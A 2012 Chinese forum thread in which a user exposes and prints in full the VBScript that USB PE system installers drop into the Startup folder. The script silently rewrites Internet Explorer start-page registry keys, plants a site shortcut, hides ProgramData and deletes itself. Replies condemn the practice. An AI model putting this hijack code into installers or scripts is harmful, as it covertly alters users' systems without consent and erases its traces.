网上那些USB装机系统安装系统后修改主页的脚本

*BIOS* *发表于 2012-06-30 13:55:35* · 发表于 2012-06-30 13:55:35

本帖最后由 BIOS 于 2012/6/30 13:57 编辑

当今USB PE流行，老xx，电xx，大xx 。。安装系统后都会把系统改成他们的主页来赚钱.
最近研究下载了好几个，有的提示：支持xx ..有的是直接静默就替换了安装后系统的主页。

他们都有一个共同点，在C:\Documents and Settings\All Users\「开始」菜单\程序\启动里面释放一个vbs脚本。

下面安装后修改系统首页的vbs脚本，在进入系统在启动里面运行。

On Error Resume Next '防止出现错误
set lhwy=createobject("wscript.shell")
On Error Resume Next '防止出现错误
path="HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\main\Start Page"
tf=lhwy.regwrite(path,"首页地址")
set path=nothing
path="HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\Internet Explorer\Main\Start Page"
tf=lhwy.regwrite(path,"首页地址")
WScript.Sleep(25000)
On Error Resume Next '防止出现错误
set lhwy=createobject("wscript.shell")
On Error Resume Next '防止出现错误
path="HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\main\Start Page"
tf=lhwy.regwrite(path,"首页地址")
set path=nothing
path="HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\Internet Explorer\Main\Start Page"
tf=lhwy.regwrite(path,"首页地址")
Const ADMINISTRATIVE_TOOLS = 6
Set objShell = CreateObject("Shell.Application")
Set objFolder = objShell.Namespace(ADMINISTRATIVE_TOOLS)
Set objFolderItem = objFolder.Self
Set objShell = WScript.CreateObject("WScript.Shell")
strDesktopFld = objFolderItem.Path
;收藏夹添加
Set objURLShortcut = objShell.CreateShortcut(strDesktopFld & "\流氓PE官网.url")
objURLShortcut.TargetPath = "http://www.xxx.xxxxxxx/"
objURLShortcut.Save
On Error Resume Next '防止出现错误
Dim objws,objfso,dn
Set objws=WScript.CreateObject("wscript.shell")
Set objfso=CreateObject("scripting.filesystemobject")
dn=objfso.GetDriveName(WScript.ScriptFullName)
objws.run "attrib +h " & dn & "\ProgramData",0
On Error Resume Next '防止出现错误
Set fso = CreateObject("Scripting.FileSystemObject")
WScript.Sleep 3000 '将脚本执行挂起1秒
fso.DeleteFile(WScript.ScriptName) '删除脚本自身
If fso.FileExists("C:\Documents and Settings\All Users\「开始」菜单\程序\启动\IE.VBS") Then fso.DeleteFile("C:\Documents and Settings\All Users\「开始」菜单\程序\启动\IE.VBS") '删除程序如果不想删除可以每次都修改主页
On Error Resume Next '防止出现错误
Set fso = CreateObject("Scripting.FileSystemObject")
WScript.Sleep 1000 '将脚本执行挂起1秒
fso.DeleteFile(WScript.ScriptName) '删除脚本自身
If fso.FileExists("C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IE.VBS") Then fso.DeleteFile("C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IE.VBS") '删除程序如果不想删除可以每次都修改主页
wscript.quit

复制代码

*80mmd* *发表于 2012-07-01 22:15:34* · 发表于 2012-07-01 22:15:34

②號发表于 2012/6/30 15:40
一般是偶遇。。也有些时候和RP有关。。

楼主这个值得表扬。

我只不过是想告诉他你说的话。

*vitas5566* *发表于 2012-06-30 23:06:01* · 发表于 2012-06-30 23:06:01

我最讨厌就是被人静默的更改掉主页
没提示这样太下作了

*none* *发表于 2012-06-30 20:59:51* · 发表于 2012-06-30 20:59:51

研究的挺透的

②號 *发表于 2012-06-30 15:40:13* · 发表于 2012-06-30 15:40:13

limingliang 发表于 2012/6/30 14:05
为什么我回帖总是被罚硬盘？

一般是偶遇。。也有些时候和RP有关。。

楼主这个值得表扬。

*80mmd* *发表于 2012-06-30 15:26:21* · 发表于 2012-06-30 15:26:21

为什么我回帖总是被罚硬盘？
[发帖际遇]: limingliang 发帖时在路边捡到 2 个硬盘，偷偷放进了背包.

*limingliang* *发表于 2012-06-30 14:05:31* · 发表于 2012-06-30 14:05:31

为什么我回帖总是被罚硬盘？

*limingliang* *发表于 2012-06-30 14:05:04* · 发表于 2012-06-30 14:05:04

这样总不好。要让人心甘情愿才行。比如说AM

[其它] 网上那些USB装机系统安装系统后修改主页的脚本

评分

评分